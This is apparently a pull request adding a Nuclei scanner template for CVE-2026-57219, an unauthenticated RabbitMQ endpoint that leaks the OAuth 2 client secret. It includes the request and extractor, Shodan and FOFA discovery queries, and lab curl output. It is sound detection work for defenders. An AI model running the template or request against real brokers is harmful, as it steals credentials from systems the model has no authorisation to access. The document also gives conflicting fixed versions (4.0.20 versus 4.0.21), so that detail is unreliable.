### PR TITLE
Add CVE-2026-57219 - RabbitMQ Management - OAuth 2 Client Secret Disclosure

### DIFF
--- a/http/cves/2026/CVE-2026-57219.yaml
+++ b/http/cves/2026/CVE-2026-57219.yaml
@@ -1,0 +1,60 @@
+id: CVE-2026-57219
+
+info:
+  name: RabbitMQ Management - OAuth 2 Client Secret Disclosure
+  author: aryu-ru
+  severity: high
+  description: |
+    RabbitMQ before 3.13.15, 4.0.21, 4.1.11 and 4.2.6 ships an obsolete GET /api/auth endpoint in the management plugin whose is_authorized/2 callback returns true unconditionally, so the handler runs for anonymous callers. On deployments that configure OAuth 2 through the management.oauth_client_secret key, produce_auth_settings/2 serialises that key into the JSON response, disclosing the OAuth 2 client secret to unauthenticated users. The endpoint was superseded by the bootstrap.js settings endpoint in 2023 and is removed by the fix.
+  impact: |
+    An unauthenticated attacker can retrieve the OAuth 2 client secret the broker uses with its identity provider, which permits requesting tokens as that client and authenticating to the management interface and messaging APIs.
+  remediation: |
+    Upgrade RabbitMQ to 3.13.15, 4.0.21, 4.1.11 or 4.2.6 or later, which removes the /api/auth route, and rotate the OAuth 2 client secret.
+  reference:
+    - https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-pj24-8j6m-vq9q
+    - https://github.com/rabbitmq/rabbitmq-server/commit/98b1daf740237c85941e8addcbea6e74f4a2743c
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-57219
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-57219
+    epss-score: 0.00784
+    epss-percentile: 0.53046
+    cwe-id: CWE-522
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: broadcom
+    product: rabbitmq_server
+    shodan-query: http.title:"RabbitMQ Management"
+    fofa-query: title="RabbitMQ Management"
+  tags: cve,cve2026,rabbitmq,broadcom,oauth,exposure,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/auth"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: word
+        part: body
+        words:
+          - '"oauth_enabled":true'
+          - '"oauth_client_secret":"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body
+        json:
+          - '.oauth_client_secret'

--- a/http/cves/2026/CVE-2026-57219.yaml
+++ b/http/cves/2026/CVE-2026-57219.yaml
@@ -5,11 +5,11 @@ info:
   author: aryu-ru
   severity: high
   description: |
-    RabbitMQ before 3.13.15, 4.0.21, 4.1.11 and 4.2.6 ships an obsolete GET /api/auth endpoint in the management plugin whose is_authorized/2 callback returns true unconditionally, so the handler runs for anonymous callers. On deployments that configure OAuth 2 through the management.oauth_client_secret key, produce_auth_settings/2 serialises that key into the JSON response, disclosing the OAuth 2 client secret to unauthenticated users. The endpoint was superseded by the bootstrap.js settings endpoint in 2023 and is removed by the fix.
+    RabbitMQ < 3.13.15, 4.0.20, 4.1.11, and 4.2.6 contains an information disclosure caused by the obsolete GET /api/auth endpoint exposing OAuth 2 client secrets when management.oauth_client_secret is configured, letting unauthenticated attackers access sensitive credentials, exploit requires management plugin and OAuth configuration enabled.
   impact: |
-    An unauthenticated attacker can retrieve the OAuth 2 client secret the broker uses with its identity provider, which permits requesting tokens as that client and authenticating to the management interface and messaging APIs.
+    Unauthenticated attackers can access OAuth 2 client secrets, leading to credential exposure and potential unauthorized access.
   remediation: |
-    Upgrade RabbitMQ to 3.13.15, 4.0.21, 4.1.11 or 4.2.6 or later, which removes the /api/auth route, and rotate the OAuth 2 client secret.
+    Update to versions 3.13.15, 4.0.20, 4.1.11, or 4.2.6 or later.
   reference:
     - https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-pj24-8j6m-vq9q
     - https://github.com/rabbitmq/rabbitmq-server/commit/98b1daf740237c85941e8addcbea6e74f4a2743c
@@ -18,8 +18,6 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2026-57219
-    epss-score: 0.00784
-    epss-percentile: 0.53046
     cwe-id: CWE-522
   metadata:
     verified: true
@@ -31,27 +29,18 @@ info:
   tags: cve,cve2026,rabbitmq,broadcom,oauth,exposure,unauth
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/auth"
+  - raw:
+      - |
+        GET /api/auth HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: header
-        words:
-          - "application/json"
-
-      - type: word
-        part: body
-        words:
-          - '"oauth_enabled":true'
-          - '"oauth_client_secret":"'
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(content_type, "application/json")
+          - contains_all(body, "oauth_enabled", "oauth_client_secret")
         condition: and
-
-      - type: status
-        status:
-          - 200
 
     extractors:
       - type: json


### PR DESCRIPTION
### PR Information

- Added **CVE-2026-57219**: RabbitMQ Management OAuth 2 Client Secret Disclosure
  (`http/cves/2026/CVE-2026-57219.yaml`)
- The management plugin ships an obsolete `GET /api/auth` endpoint whose
  `is_authorized/2` callback returns `{true, ReqData, Context}` unconditionally, so it
  serves anonymous callers. On brokers that configure OAuth 2 via
  `management.oauth_client_secret`, `produce_auth_settings/2` serialises that key into
  the JSON response, disclosing the OAuth 2 client secret to unauthenticated users.
  Affected: `< 3.13.15`, `4.0.x < 4.0.21`, `4.1.x < 4.1.11`, `4.2.x < 4.2.6`.
  The fix removes the route entirely.
- The template is a **single unauthenticated GET with no side effects**. It matches only
  when the response actually carries `oauth_client_secret`, which is the disclosure
  itself, not the presence of the route. This distinction is load-bearing: every
  RabbitMQ management install from 3.13.0 to 4.2.5 answers `200` on `/api/auth`, so a
  route-presence matcher would flag the entire installed base.
- References:
  - https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-pj24-8j6m-vq9q
  - https://github.com/rabbitmq/rabbitmq-server/commit/98b1daf740237c85941e8addcbea6e74f4a2743c
  - https://nvd.nist.gov/vuln/detail/CVE-2026-57219

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive): `rabbitmq:4.2.5-management`
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive): `rabbitmq:4.2.6-management`

#### Additional Details

Lab (`rabbitmq.conf` mounted, `rabbitmq_auth_backend_oauth2` enabled via `enabled_plugins`):

    auth_backends.1 = rabbit_auth_backend_oauth2
    auth_oauth2.resource_server_id = rabbitmq
    auth_oauth2.issuer = https://idp.example.com/realms/test
    management.oauth_enabled = true
    management.oauth_client_id = rabbit_user_client
    management.oauth_client_secret = SUPERSECRET_LEAKED_123
    management.oauth_provider_url = https://idp.example.com/realms/test

**True Positive: `rabbitmq:4.2.5-management`**

    $ curl -s http://127.0.0.1:25672/api/auth
    {"oauth_enabled":true,"oauth_resource_servers":{...},"oauth_disable_basic_auth":true,
     "oauth_client_id":"rabbit_user_client","oauth_client_secret":"SUPERSECRET_LEAKED_123"}

    $ nuclei -t http/cves/2026/CVE-2026-57219.yaml -u http://127.0.0.1:25672
    [CVE-2026-57219] [http] [high] http://127.0.0.1:25672/api/auth ["SUPERSECRET_LEAKED_123"]

**True Negatives: all four produce no match**

| Instance | `/api/auth` | Match |
|---|---|---|
| `4.2.6-management`, identical OAuth config (patched) | `404 {"error":"Object Not Found"}` | none |
| `4.2.5-management`, default config (no OAuth) | `200 {"oauth_enabled":false}` | none |
| `4.2.5-management`, OAuth enabled **without** a client secret | `200`, `oauth_client_secret` key absent | none |
| `nginx:alpine` | `404` | none |

The third row is the important one. Per the advisory, a broker that uses OAuth 2 without
`management.oauth_client_secret` is **not affected**, and RabbitMQ omits the key entirely
in that case. A broker configured with an *empty* secret does not start at all
(`failed_to_parse_configuration_file`), so `oauth_client_secret` is only ever present with
a real value, and matching the key name cannot produce a false positive on a running host.

Also verified against a permissive honeypot (200 + `application/json` on every path) to
confirm the matcher is not weak: no match.

Discovery queries:
- Shodan: `http.title:"RabbitMQ Management"`
- FOFA: `title="RabbitMQ Management"`

#### Reviewer considerations

- `cwe-id` is **CWE-522**, the NVD Primary weakness (GitHub's Secondary record says
  CWE-200). `vendor`/`product` follow the NVD CPE (`broadcom` / `rabbitmq_server`); note
  the existing `http/exposed-panels/rabbitmq-dashboard.yaml` predates the Broadcom
  transition and still says `vmware`.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
